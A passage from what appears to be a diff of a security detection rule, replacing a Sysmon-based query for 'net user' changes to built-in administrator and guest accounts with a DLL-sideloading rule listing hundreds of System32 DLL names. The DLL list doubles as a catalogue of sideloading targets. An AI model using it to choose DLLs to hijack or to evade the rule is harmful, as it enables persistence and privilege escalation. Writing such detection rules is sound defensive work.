For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% 
\"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE 